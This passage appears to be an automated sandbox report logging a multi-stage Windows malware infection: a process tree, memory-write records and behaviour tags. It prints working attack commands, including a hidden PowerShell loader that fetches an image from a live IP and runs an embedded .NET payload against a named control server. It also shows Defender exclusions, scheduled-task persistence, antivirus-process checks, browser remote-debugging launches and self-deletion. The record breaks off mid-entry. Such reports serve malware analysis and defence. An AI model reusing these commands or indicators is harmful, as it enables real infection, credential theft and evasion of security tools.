PID 1076 wrote to memory of 3444	1076	CMD.exe	96
PID 1076 wrote to memory of 3444	1076	CMD.exe	96
PID 1076 wrote to memory of 2084	1076	CMD.exe	97
PID 1076 wrote to memory of 2084	1076	CMD.exe	97
PID 1076 wrote to memory of 2084	1076	CMD.exe	97
PID 1076 wrote to memory of 2320	1076	CMD.exe	98
PID 1076 wrote to memory of 2320	1076	CMD.exe	98
PID 1076 wrote to memory of 2320	1076	CMD.exe	98
PID 1076 wrote to memory of 3552	1076	CMD.exe	99
PID 1076 wrote to memory of 3552	1076	CMD.exe	99
PID 1076 wrote to memory of 3552	1076	CMD.exe	99
PID 1076 wrote to memory of 3824	1076	CMD.exe	100
PID 1076 wrote to memory of 3824	1076	CMD.exe	100
PID 1076 wrote to memory of 3824	1076	CMD.exe	100
PID 1076 wrote to memory of 5588	1076	CMD.exe	101
PID 1076 wrote to memory of 5588	1076	CMD.exe	101
PID 1076 wrote to memory of 5588	1076	CMD.exe	101
PID 1076 wrote to memory of 792	1076	CMD.exe	102
PID 1076 wrote to memory of 792	1076	CMD.exe	102
PID 1076 wrote to memory of 792	1076	CMD.exe	102
PID 1076 wrote to memory of 4732	1076	CMD.exe	103
PID 1076 wrote to memory of 4732	1076	CMD.exe	103
PID 1076 wrote to memory of 4732	1076	CMD.exe	103
PID 1076 wrote to memory of 5156	1076	CMD.exe	104
PID 1076 wrote to memory of 5156	1076	CMD.exe	104
PID 1076 wrote to memory of 5156	1076	CMD.exe	104
PID 1472 wrote to memory of 4004	1472	rapes.exe	106
PID 1472 wrote to memory of 4004	1472	rapes.exe	106
PID 1472 wrote to memory of 4004	1472	rapes.exe	106
PID 4732 wrote to memory of 848	4732	Organizations.com	107
PID 4732 wrote to memory of 848	4732	Organizations.com	107
PID 4732 wrote to memory of 848	4732	Organizations.com	107

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
6012	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3032
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:848

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2276
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G8U31.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G8U31.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P27l3.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P27l3.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:236
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1472
    - - C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5752
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe
        6⤵
        Views/modifies file attributes
        
        PID:6012
    - - C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5148
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1076
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3764
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3560
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3444
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2084
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 440824
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2320
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Architecture.wmv
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3552
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Offensive" Inter
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3824
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5588
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:792
        
        C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
        
        Organizations.com h
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4732
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 964
        8⤵
        Program crash
        
        PID:748
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5156
    - - C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4004
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
        6⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        
        PID:3616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3528
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5928
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3D52.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3544
      - C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
        6⤵
        Executes dropped EXE
        
        PID:6060
      - C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3456
    - - C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2068
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ffa9b87dcf8,0x7ffa9b87dd04,0x7ffa9b87dd10
        7⤵
        
        PID:4160
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1820,i,1255686494002211988,9597767757915886283,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1816 /prefetch:2
        7⤵
        
        PID:1528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1756,i,1255686494002211988,9597767757915886283,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1924 /prefetch:11
        7⤵
        
        PID:5980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2392,i,1255686494002211988,9597767757915886283,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2536 /prefetch:13
        7⤵
        
        PID:1068
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,1255686494002211988,9597767757915886283,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3256 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:112
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,1255686494002211988,9597767757915886283,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3276 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5144
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4312,i,1255686494002211988,9597767757915886283,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4340 /prefetch:9
        7⤵
        Uses browser remote debugging
        
        PID:4412
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4696,i,1255686494002211988,9597767757915886283,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4716 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:4644
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5200,i,1255686494002211988,9597767757915886283,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5212 /prefetch:14
        7⤵
        
        PID:1740
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5336,i,1255686494002211988,9597767757915886283,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5904 /prefetch:14
        7⤵
        
        PID:5340
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        
        PID:4932
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        7⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:5004
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x284,0x7ffa9b85f208,0x7ffa9b85f214,0x7ffa9b85f220
        8⤵
        
        PID:4816
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1836,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:11
        8⤵
        
        PID:3588
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2100,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=2096 /prefetch:2
        8⤵
        
        PID:3444
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2444,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=2640 /prefetch:13
        8⤵
        
        PID:5256
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3500,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3516,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5924
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4172,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5948
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4156,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:9
        8⤵
        Uses browser remote debugging
        
        PID:1000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4220,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=4296 /prefetch:9
        8⤵
        Uses browser remote debugging
        
        PID:3788
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4192,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=4268 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3792
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5140,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:14
        8⤵
        
        PID:2992
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5244,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:14
        8⤵
        
        PID:4108
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5368,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:14
        8⤵
        
        PID:5220
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5272,i,11253145896842554282,6468296461203783017,262144 --variations-seed-version --mojo-platform-channel-handle=5312 /prefetch:14
        8⤵
        
        PID:5448
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\k689z" & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4524
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5320
    - - C:\Users\Admin\AppData\Local\Temp\10287990101\wjfOfXh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10287990101\wjfOfXh.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2768
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10288540141\4wAPcC0.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2732
      - C:\Windows\system32\windowspowershell\v1.0\powershell.exe
        
        "C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe"
        6⤵
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2084
    - - C:\Users\Admin\AppData\Local\Temp\10288740101\Kr9UTz2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10288740101\Kr9UTz2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2596
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:5568
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4284
    - - C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2528
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:3876
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2816
    - - C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe"
        5⤵
        Executes dropped EXE
        
        PID:1580
      - C:\Users\Admin\AppData\Local\Temp\onefile_1580_133871208239946199\windowscore.exe
        
        C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1436
    - - C:\Users\Admin\AppData\Local\Temp\10293930101\ARxx7NW.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10293930101\ARxx7NW.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5192
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1908
      - C:\Program Files\RuntimeApp\0000032364.exe
        
        "C:\Program Files\RuntimeApp\0000032364.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4488
    - - C:\Users\Admin\AppData\Local\Temp\10297860101\d3jhg_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10297860101\d3jhg_003.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:4004
      - C:\Windows\SYSTEM32\cmd.exe
        
